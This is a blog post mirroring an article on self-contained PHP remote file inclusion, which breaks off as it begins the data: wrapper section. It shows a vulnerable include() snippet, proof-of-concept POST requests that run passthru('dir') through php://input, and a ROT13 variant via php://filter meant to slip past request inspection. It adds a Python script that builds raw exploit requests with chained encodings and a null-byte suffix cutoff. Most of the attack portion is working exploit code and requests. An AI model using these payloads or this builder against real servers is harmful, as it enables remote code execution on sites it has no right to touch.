Showing posts from March, 2011

Self Contained RFI in PHP

This is a direct rip from here: http://www.cr0w.ru/2009/03/self-contained-file-include-in-php-520.html It is for my own record and can be seen as a mirror. :)

These two tricks can sometimes be useful in RFI attacks: neither needs a file hosted on an attacker-controlled server, because the PHP code is carried inside the request itself.

1. Using php://input wrapper

The php://input wrapper lets a script read the raw POST request body (http://ru2.php.net/wrappers.php). If an attacker can make include() open php://input, the body of the request is parsed and executed as PHP.

For example, take the following code:


<?
if ( include($_GET['file'] . '.php') ) {
    echo 'Henck!';
} else {
    echo 'Error!';
}
?>

For exploitation we need:

allow_url_include=On (include() of php://input counts as a URL include; the directive exists since PHP 5.2.0)
magic_quotes_gpc=Off (the code appends '.php' to the parameter, so in practice the suffix is cut off with a %00 null byte after php://input, which only works on PHP before 5.3.4; magic quotes would escape that byte)

PoC:

POST http://site.com/index.php?file=php://input HTTP/1.1
Host: site.com

<?php passthru('dir'); ?>


The php://filter wrapper (available since PHP 5.0.0) can additionally be wrapped around php://input so that the payload travels encoded, which helps against naive inspection of the request body. PHP applies the read filter while reading the stream, so the body has to be sent in the encoded form (here ROT13) and the target decodes it before the include:

POST http://site.com/index.php?file=php://filter/read=string.rot13/resource=php://input HTTP/1.1
Host: site.com

<?cuc cnffgueh('qve'); ?>
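The following Python script is an added example, not part of the mirrored cr0w.ru post. It builds the raw requests for both PoCs above and makes explicit why the body must be pre-encoded when php://filter sits in front of php://input: PHP applies the read filters while reading, so the client applies the inverse transforms in reverse order. It goes beyond the page in chaining several read filters with `|` (string.rot13 followed by convert.base64-decode) and in modelling the target's side so the round trip can be checked offline. The host site.com and script /index.php are taken from the PoC; the %00 suffix cut-off is an assumption about the target (PHP before 5.3.4 with magic_quotes_gpc=Off) and can be switched off.

```python
import base64
import codecs
from urllib.parse import quote


def _rot13(data: bytes) -> bytes:
    """string.rot13 is its own inverse; it only touches ASCII letters."""
    return codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")


# For each php://filter read filter: (what PHP does while reading the stream,
# what we must do to the payload beforehand so the target gets the original).
FILTERS = {
    "string.rot13": (_rot13, _rot13),
    "convert.base64-decode": (base64.b64decode, base64.b64encode),
}


def encode_for_filter(filters, payload: bytes) -> bytes:
    """Pre-encode payload for a read=<f1>|<f2>|... chain.

    PHP applies read filters left to right, so the inverses go right to left."""
    data = payload
    for name in reversed(filters):
        data = FILTERS[name][1](data)
    return data


def apply_filters_like_php(filters, data: bytes) -> bytes:
    """Model of what the target's php://filter chain does to the stream."""
    for name in filters:
        data = FILTERS[name][0](data)
    return data


def build_file_param(filters=(), null_byte=True) -> str:
    """Value for ?file= so that include($_GET['file'] . '.php') reads the body.

    null_byte appends %00 to cut off the '.php' the code adds. Assumption: the
    target runs PHP before 5.3.4 with magic_quotes_gpc=Off (magic quotes would
    escape the NUL). Against code that appends nothing, pass null_byte=False.
    """
    target = "php://input"
    if filters:
        target = "php://filter/read=%s/resource=%s" % ("|".join(filters), target)
    return quote(target, safe=":/=|") + ("%00" if null_byte else "")


def build_request(host: str, script: str, payload: bytes,
                  filters=(), null_byte=True) -> bytes:
    """Raw HTTP/1.1 request. php://input is the raw body, so any Content-Type
    except multipart/form-data works (php://input is unavailable for that one)."""
    body = encode_for_filter(filters, payload)
    head = (
        "POST %s?file=%s HTTP/1.1\r\n"
        "Host: %s\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: %d\r\n"
        "Connection: close\r\n"
        "\r\n" % (script, build_file_param(filters, null_byte), host, len(body))
    )
    return head.encode("ascii") + body


if __name__ == "__main__":
    payload = b"<?php passthru('dir'); ?>"
    # Plain php://input, as in the first PoC.
    print(build_request("site.com", "/index.php", payload).decode("latin-1"))
    # Same payload sent ROT13-encoded; the target's read filter decodes it.
    print(build_request("site.com", "/index.php", payload,
                        ["string.rot13"]).decode("latin-1"))
    # Two filters chained with '|': PHP runs rot13 first, then base64-decode.
    chain = ["string.rot13", "convert.base64-decode"]
    sent = encode_for_filter(chain, payload)
    assert apply_filters_like_php(chain, sent) == payload
    print(sent.decode("ascii"))
```

The constructed request is written to stdout rather than sent, so it can be checked against the PoC above or piped into a tool of your choice; the Content-Length header is required for a raw HTTP/1.1 POST and is computed from the encoded body, not the plaintext payload.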


2. Using data: wrapper

Since version 5.2.0 PHP supports "data" …